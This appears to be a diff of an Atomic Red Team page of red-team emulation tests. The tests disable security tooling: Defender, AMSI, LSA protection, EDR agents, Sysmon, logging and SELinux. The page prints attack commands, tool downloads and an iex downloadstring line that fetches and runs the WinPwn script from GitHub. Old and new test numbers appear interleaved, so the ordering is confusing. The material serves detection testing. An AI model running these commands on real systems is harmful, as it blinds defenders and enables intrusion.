- [Atomic Test #50: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli)
- [Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune)
- [Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo)
- [Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key)
- [Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd)
- [Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell)
- [Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd)
- [Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell)
- [Atomic Test #58: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze)
- [Atomic Test #59: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux)
- [Atomic Test #1: Windows Disable LSA Protection](#atomic-test-1-windows-disable-lsa-protection)
- [Atomic Test #2: Disable journal logging via systemctl utility](#atomic-test-2-disable-journal-logging-via-systemctl-utility)
- [Atomic Test #3: Disable journal logging via sed utility](#atomic-test-3-disable-journal-logging-via-sed-utility)
- [Atomic Test #4: Disable syslog](#atomic-test-1-disable-syslog)
- [Atomic Test #5: Disable syslog (freebsd)](#atomic-test-2-disable-syslog-freebsd)
- [Atomic Test #6: Disable Cb Response](#atomic-test-3-disable-cb-response)
- [Atomic Test #7: Disable SELinux](#atomic-test-4-disable-selinux)
- [Atomic Test #8: Stop Crowdstrike Falcon on Linux](#atomic-test-5-stop-crowdstrike-falcon-on-linux)
- [Atomic Test #9: Disable Carbon Black Response](#atomic-test-6-disable-carbon-black-response)
- [Atomic Test #10: Disable LittleSnitch](#atomic-test-7-disable-littlesnitch)
- [Atomic Test #11: Disable OpenDNS Umbrella](#atomic-test-8-disable-opendns-umbrella)
- [Atomic Test #12: Disable macOS Gatekeeper](#atomic-test-9-disable-macos-gatekeeper)
- [Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS](#atomic-test-10-stop-and-unload-crowdstrike-falcon-on-macos)
- [Atomic Test #14: Unload Sysmon Filter Driver](#atomic-test-11-unload-sysmon-filter-driver)
- [Atomic Test #15: Uninstall Sysmon](#atomic-test-12-uninstall-sysmon)
- [Atomic Test #16: AMSI Bypass - AMSI InitFailed](#atomic-test-13-amsi-bypass---amsi-initfailed)
- [Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key](#atomic-test-14-amsi-bypass---remove-amsi-provider-reg-key)
- [Atomic Test #18: Disable Arbitrary Security Windows Service](#atomic-test-15-disable-arbitrary-security-windows-service)
- [Atomic Test #19: Tamper with Windows Defender ATP PowerShell](#atomic-test-16-tamper-with-windows-defender-atp-powershell)
- [Atomic Test #20: Tamper with Windows Defender Command Prompt](#atomic-test-17-tamper-with-windows-defender-command-prompt)
- [Atomic Test #21: Tamper with Windows Defender Registry](#atomic-test-18-tamper-with-windows-defender-registry)
- [Atomic Test #22: Disable Microsoft Office Security Features](#atomic-test-19-disable-microsoft-office-security-features)
- [Atomic Test #23: Remove Windows Defender Definition Files](#atomic-test-20-remove-windows-defender-definition-files)
- [Atomic Test #24: Stop and Remove Arbitrary Security Windows Service](#atomic-test-21-stop-and-remove-arbitrary-security-windows-service)
- [Atomic Test #25: Uninstall Crowdstrike Falcon on Windows](#atomic-test-22-uninstall-crowdstrike-falcon-on-windows)
- [Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder](#atomic-test-23-tamper-with-windows-defender-evade-scanning--folder)
- [Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension](#atomic-test-24-tamper-with-windows-defender-evade-scanning--extension)
- [Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process](#atomic-test-25-tamper-with-windows-defender-evade-scanning--process)
- [Atomic Test #29: office-365-Disable-AntiPhishRule](#atomic-test-26-office-365-disable-antiphishrule)
- [Atomic Test #30: Disable Windows Defender with DISM](#atomic-test-27-disable-windows-defender-with-dism)
- [Atomic Test #31: Disable Defender Using NirSoft AdvancedRun](#atomic-test-28-disable-defender-using-nirsoft-advancedrun)
- [Atomic Test #32: Kill antimalware protected processes using Backstab](#atomic-test-29-kill-antimalware-protected-processes-using-backstab)
- [Atomic Test #33: WinPwn - Kill the event log services for stealth](#atomic-test-30-winpwn---kill-the-event-log-services-for-stealth)
- [Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31-tamper-with-windows-defender-atp-using-aliases---powershell)
- [Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd](#atomic-test-32-lockbit-black---disable-privacy-settings-experience-using-registry--cmd)
- [Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd](#atomic-test-33-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--cmd)
- [Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell](#atomic-test-34-lockbit-black---disable-privacy-settings-experience-using-registry--powershell)
- [Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell](#atomic-test-35-lockbit-black---use-registry-editor-to-turn-on-automatic-logon--powershell)
- [Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature](#atomic-test-36-disable-windows-defender-with-pwsh-disable-windowsoptionalfeature)
- [Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder](#atomic-test-37-wmic-tamper-with-windows-defender-evade-scanning-folder)
- [Atomic Test #41: Delete Windows Defender Scheduled Tasks](#atomic-test-38-delete-windows-defender-scheduled-tasks)
- [Atomic Test #42: Clear History](#atomic-test-39-clear-history)
- [Atomic Test #43: Suspend History](#atomic-test-40-suspend-history)
- [Atomic Test #44: Reboot Linux Host via Kernel System Request](#atomic-test-41-reboot-linux-host-via-kernel-system-request)
- [Atomic Test #45: Clear Pagging Cache](#atomic-test-42-clear-pagging-cache)
- [Atomic Test #46: Disable Memory Swap](#atomic-test-43-disable-memory-swap)
- [Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)](#atomic-test-44-disable-hypervisor-enforced-code-integrity-hvci)
- [Atomic Test #48: AMSI Bypass - Override AMSI via COM](#atomic-test-45-amsi-bypass---override-amsi-via-com)
- [Atomic Test #49: AWS - GuardDuty Suspension or Deletion](#atomic-test-46-aws---guardduty-suspension-or-deletion)
- [Atomic Test #50: Tamper with Defender ATP on Linux/MacOS](#atomic-test-47-tamper-with-defender-atp-on-linuxmacos)
- [Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe](#atomic-test-48-tamper-with-windows-defender-registry---regexe)
- [Atomic Test #52: Tamper with Windows Defender Registry - Powershell](#atomic-test-49-tamper-with-windows-defender-registry---powershell)
- [Atomic Test #53: ESXi - Disable Account Lockout Policy via PowerCLI](#atomic-test-50-esxi---disable-account-lockout-policy-via-powercli)
- [Atomic Test #54: Delete Microsoft Defender ASR Rules - InTune](#atomic-test-51-delete-microsoft-defender-asr-rules---intune)
- [Atomic Test #55: Delete Microsoft Defender ASR Rules - GPO](#atomic-test-52-delete-microsoft-defender-asr-rules---gpo)
- [Atomic Test #56: AMSI Bypass - Create AMSIEnable Reg Key](#atomic-test-53-amsi-bypass---create-amsienable-reg-key)
- [Atomic Test #57: Disable EventLog-Application Auto Logger Session Via Registry - Cmd](#atomic-test-54-disable-eventlog-application-auto-logger-session-via-registry---cmd)
- [Atomic Test #58: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell](#atomic-test-55-disable-eventlog-application-auto-logger-session-via-registry---powershell)
- [Atomic Test #59: Disable EventLog-Application ETW Provider Via Registry - Cmd](#atomic-test-56-disable-eventlog-application-etw-provider-via-registry---cmd)
- [Atomic Test #60: Disable EventLog-Application ETW Provider Via Registry - PowerShell](#atomic-test-57-disable-eventlog-application-etw-provider-via-registry---powershell)
- [Atomic Test #61: Freeze PPL-protected process with EDR-Freeze](#atomic-test-58-freeze-ppl-protected-process-with-edr-freeze)
- [Atomic Test #62: Disable ASLR Via sysctl parameters - Linux](#atomic-test-59-disable-aslr-via-sysctl-parameters---linux)
- [Atomic Test #63: Auditing Configuration Changes on Linux Host](#atomic-test-1-auditing-configuration-changes-on-linux-host)
- [Atomic Test #64: Auditing Configuration Changes on FreeBSD Host](#atomic-test-2-auditing-configuration-changes-on-freebsd-host)
- [Atomic Test #65: Logging Configuration Changes on Linux Host](#atomic-test-3-logging-configuration-changes-on-linux-host)
- [Atomic Test #66: Logging Configuration Changes on FreeBSD Host](#atomic-test-4-logging-configuration-changes-on-freebsd-host)
- [Atomic Test #67: Disable Powershell ETW Provider - Windows](#atomic-test-5-disable-powershell-etw-provider---windows)
- [Atomic Test #68: Disable .NET Event Tracing for Windows Via Registry (cmd)](#atomic-test-6-disable-net-event-tracing-for-windows-via-registry-cmd)
- [Atomic Test #69: Disable .NET Event Tracing for Windows Via Registry (powershell)](#atomic-test-7-disable-net-event-tracing-for-windows-via-registry-powershell)
- [Atomic Test #70: LockBit Black - Disable the ETW Provider of Windows Defender -cmd](#atomic-test-8-lockbit-black---disable-the-etw-provider-of-windows-defender--cmd)
- [Atomic Test #71: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell](#atomic-test-9-lockbit-black---disable-the-etw-provider-of-windows-defender--powershell)
- [Atomic Test #72: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd](#atomic-test-10-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---cmd)
- [Atomic Test #73: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell](#atomic-test-11-disable-net-event-tracing-for-windows-via-environment-variable-hkcu-registry---powershell)
- [Atomic Test #74: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd](#atomic-test-12-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---cmd)
- [Atomic Test #75: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell](#atomic-test-13-disable-net-event-tracing-for-windows-via-environment-variable-hklm-registry---powershell)
- [Atomic Test #76: Block Cybersecurity communication by leveraging Windows Name Resolution Policy Table](#atomic-test-14-block-cybersecurity-communication-by-leveraging-windows-name-resolution-policy-table)
### Atomic Test #1: Disable syslog
### Atomic Test #1: Windows Disable LSA Protection
The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
**Supported Platforms:** Windows
**auto_generated_guid:** `40075d5f-3a70-4c66-9125-f72bee87247d`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```cmd
reg delete HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /f >nul 2>&1
```
### Atomic Test #2: Disable journal logging via systemctl utility
The atomic test disables the journal logging using built-in systemctl utility
**Supported Platforms:** Linux
**auto_generated_guid:** `c3a377f9-1203-4454-aa35-9d391d34768f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo systemctl stop systemd-journald #disables journal logging
```
#### Cleanup Commands
```sh
sudo systemctl start systemd-journald #starts journal service
sudo systemctl enable systemd-journald #starts journal service automatically at boot time
```
### Atomic Test #3: Disable journal logging via sed utility
The atomic test disables the journal logging by searching and replacing the "Storage" parameter to "none" within the journald.conf file, thus any new journal entries will only be temporarily available in memory and not written to disk
**Supported Platforms:** Linux
**auto_generated_guid:** `12e5551c-8d5c-408e-b3e4-63f53b03379f`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
```
#### Cleanup Commands
```sh
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf #re-enables storage of journal data
sudo systemctl restart systemd-journald #restart the journal service
```
### Atomic Test #4: Disable syslog
Disables syslog collection
@@ -127,7 +210,7 @@ if #{package_checker} > /dev/null; then exit 0; else exit 1; fi
sudo #{package_installer}
```
### Atomic Test #2: Disable syslog (freebsd)
### Atomic Test #5: Disable syslog (freebsd)
Disables syslog collection
@@ -148,7 +231,7 @@ sysrc syslogd_enable="NO"
sysrc syslogd_enable="YES"
service syslogd start
```
### Atomic Test #3: Disable Cb Response
### Atomic Test #6: Disable Cb Response
Disable the Cb Response service
@@ -169,7 +252,7 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
fi
```
### Atomic Test #4: Disable SELinux
### Atomic Test #7: Disable SELinux
Disables SELinux enforcement
@@ -205,7 +288,7 @@ which setenforce
echo "SELinux is not installed"; exit 1
```
### Atomic Test #5: Stop Crowdstrike Falcon on Linux
### Atomic Test #8: Stop Crowdstrike Falcon on Linux
Stop and disable Crowdstrike Falcon on Linux
@@ -226,7 +309,7 @@ sudo systemctl disable falcon-sensor.service
sudo systemctl enable falcon-sensor.service
sudo systemctl start falcon-sensor.service
```
### Atomic Test #6: Disable Carbon Black Response
### Atomic Test #9: Disable Carbon Black Response
Disables Carbon Black Response
@@ -247,7 +330,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.defense.daemon.plis
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.daemon.plist
sudo launchctl load -w /Library/LaunchDaemons/com.carbonblack.defense.daemon.plist
```
### Atomic Test #7: Disable LittleSnitch
### Atomic Test #10: Disable LittleSnitch
Disables LittleSnitch
@@ -266,7 +349,7 @@ sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```sh
sudo launchctl load -w /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
### Atomic Test #8: Disable OpenDNS Umbrella
### Atomic Test #11: Disable OpenDNS Umbrella
Disables OpenDNS Umbrella
@@ -285,7 +368,7 @@ sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfig
```sh
sudo launchctl load -w /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
### Atomic Test #9: Disable macOS Gatekeeper
### Atomic Test #12: Disable macOS Gatekeeper
Disables macOS Gatekeeper
@@ -304,7 +387,7 @@ sudo spctl --master-disable
```sh
sudo spctl --master-enable
```
### Atomic Test #10: Stop and unload Crowdstrike Falcon on macOS
### Atomic Test #13: Stop and unload Crowdstrike Falcon on macOS
Stop and unload Crowdstrike Falcon daemons falcond and userdaemon on macOS
@@ -332,7 +415,7 @@ sudo launchctl unload #{userdaemon_plist}
sudo launchctl load -w #{falcond_plist}
sudo launchctl load -w #{userdaemon_plist}
```
### Atomic Test #11: Unload Sysmon Filter Driver
### Atomic Test #14: Unload Sysmon Filter Driver
Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution,
run the prereq_command's and it should fail with an error of "sysmon filter must be loaded".
@@ -415,7 +498,7 @@ if(Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Sysmon\Sysmon.exe"){
}
```
### Atomic Test #12: Uninstall Sysmon
### Atomic Test #15: Uninstall Sysmon
Uninstall Sysinternals Sysmon for Defense Evasion
@@ -427,7 +510,7 @@ Uninstall Sysinternals Sysmon for Defense Evasion
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder&#92;T1562.001&#92;bin&#92;sysmon.exe|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | path | PathToAtomicsFolder&#92;T1685&#92;bin&#92;sysmon.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
@@ -475,7 +558,7 @@ if(cmd /c sc query sysmon) { exit 0} else { exit 1}
cmd /c sysmon -i -accepteula
```
### Atomic Test #13: AMSI Bypass - AMSI InitFailed
### Atomic Test #16: AMSI Bypass - AMSI InitFailed
Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true.
Upon execution, no output is displayed.
@@ -497,7 +580,7 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```
### Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key
### Atomic Test #17: AMSI Bypass - Remove AMSI Provider Reg Key
With administrative rights, an adversary can remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection.
This test removes the Windows Defender provider registry key. Upon execution, no output is displayed.
@@ -518,7 +601,7 @@ Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-9
```powershell
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" -ErrorAction Ignore | Out-Null
```
### Atomic Test #15: Disable Arbitrary Security Windows Service
### Atomic Test #18: Disable Arbitrary Security Windows Service
With administrative rights, an adversary can disable Windows Services related to security products. This test requires McAfeeDLPAgentService to be installed.
Change the service_name input argument for your AV solution. Upon exeuction, infomration will be displayed stating the status of the service.
@@ -547,7 +630,7 @@ sc.exe config #{service_name} start= disabled
sc.exe config #{service_name} start= auto >nul 2>&1
net.exe start #{service_name} >nul 2>&1
```
### Atomic Test #16: Tamper with Windows Defender ATP PowerShell
### Atomic Test #19: Tamper with Windows Defender ATP PowerShell
Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
@@ -573,7 +656,7 @@ Set-MpPreference -DisableBehaviorMonitoring 0
Set-MpPreference -DisableScriptScanning 0
Set-MpPreference -DisableBlockAtFirstSeen 0
```
### Atomic Test #17: Tamper with Windows Defender Command Prompt
### Atomic Test #20: Tamper with Windows Defender Command Prompt
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator.
However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied"
@@ -597,7 +680,7 @@ sc query WinDefend
sc start WinDefend >nul 2>&1
sc config WinDefend start=enabled >nul 2>&1
```
### Atomic Test #18: Tamper with Windows Defender Registry
### Atomic Test #21: Tamper with Windows Defender Registry
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be
grayed out and have no info.
@@ -617,7 +700,7 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
```powershell
Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 0
```
### Atomic Test #19: Disable Microsoft Office Security Features
### Atomic Test #22: Disable Microsoft Office Security Features
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not
show any warning before editing the document.
@@ -647,7 +730,7 @@ New-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Prot
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security" -Name "VBAWarnings" -ErrorAction Ignore | Out-Null
Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView" -ErrorAction Ignore
```
### Atomic Test #20: Remove Windows Defender Definition Files
### Atomic Test #23: Remove Windows Defender Definition Files
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments.
On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
@@ -665,7 +748,7 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
### Atomic Test #21: Stop and Remove Arbitrary Security Windows Service
### Atomic Test #24: Stop and Remove Arbitrary Security Windows Service
Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
@@ -686,7 +769,7 @@ Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}
```
### Atomic Test #22: Uninstall Crowdstrike Falcon on Windows
### Atomic Test #25: Uninstall Crowdstrike Falcon on Windows
Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
@@ -706,7 +789,7 @@ Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as a
if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
```
### Atomic Test #23: Tamper with Windows Defender Evade Scanning -Folder
### Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder
Malware can exclude a specific path from being scanned and evading detection.
Upon successul execution, the file provided should be on the list of excluded path.
@@ -735,7 +818,7 @@ Add-MpPreference -ExclusionPath $excludedpath
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath
```
### Atomic Test #24: Tamper with Windows Defender Evade Scanning -Extension
### Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension
Malware can exclude specific extensions from being scanned and evading detection.
Upon successful execution, the extension(s) should be on the list of excluded extensions.
@@ -764,7 +847,7 @@ Add-MpPreference -ExclusionExtension $excludedExts
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
```
### Atomic Test #25: Tamper with Windows Defender Evade Scanning -Process
### Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process
Malware can exclude specific processes from being scanned and evading detection.
Upon successful execution, the process(es) should be on the list of excluded processes.
@@ -793,7 +876,7 @@ Add-MpPreference -ExclusionProcess $excludedProcess
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess $excludedProcess
```
### Atomic Test #26: office-365-Disable-AntiPhishRule
### Atomic Test #29: office-365-Disable-AntiPhishRule
Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
@@ -851,7 +934,7 @@ Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
```
### Atomic Test #27: Disable Windows Defender with DISM
### Atomic Test #30: Disable Windows Defender with DISM
The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool.
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
@@ -868,7 +951,7 @@ This method will remove Defender and it's package.
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
```
### Atomic Test #28: Disable Defender Using NirSoft AdvancedRun
### Atomic Test #31: Disable Defender Using NirSoft AdvancedRun
Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
@@ -920,7 +1003,7 @@ Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathT
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force
```
### Atomic Test #29: Kill antimalware protected processes using Backstab
### Atomic Test #32: Kill antimalware protected processes using Backstab
Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
https://github.com/Yaxser/Backstab
@@ -959,7 +1042,7 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"
```
### Atomic Test #30: WinPwn - Kill the event log services for stealth
### Atomic Test #33: WinPwn - Kill the event log services for stealth
Kill the event log services for stealth via function of WinPwn
@@ -974,7 +1057,7 @@ iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/
inv-phantom -consoleoutput -noninteractive
```
### Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell
### Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell
Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
@@ -1000,7 +1083,7 @@ Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
```
### Atomic Test #32: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
### Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
LockBit Black - Disable Privacy Settings Experience Using Registry
@@ -1019,7 +1102,7 @@ reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperie
```cmd
reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
```
### Atomic Test #33: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
### Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
LockBit Black - Use Registry Editor to turn on automatic logon
@@ -1044,7 +1127,7 @@ reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
```
### Atomic Test #34: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
### Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
LockBit Black - Disable Privacy Settings Experience Using Registry
@@ -1063,7 +1146,7 @@ New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisableP
```powershell
Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
```
### Atomic Test #35: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
### Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
Lockbit Black - Use Registry Editor to turn on automatic logon
@@ -1088,7 +1171,7 @@ Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
```
### Atomic Test #36: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
### Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
@@ -1109,7 +1192,7 @@ Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestar
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
```
### Atomic Test #37: WMIC Tamper with Windows Defender Evade Scanning Folder
### Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
@@ -1129,7 +1212,7 @@ wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference ca
```cmd
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
```
### Atomic Test #38: Delete Windows Defender Scheduled Tasks
### Atomic Test #41: Delete Windows Defender Scheduled Tasks
The following atomic test will delete the Windows Defender scheduled tasks.
@@ -1176,7 +1259,7 @@ schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender V
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"
```
### Atomic Test #39: Clear History
### Atomic Test #42: Clear History
Clear Shell History. This technique only affect the bash shell application.
@@ -1190,7 +1273,7 @@ Clear Shell History. This technique only affect the bash shell application.
history -c
```
### Atomic Test #40: Suspend History
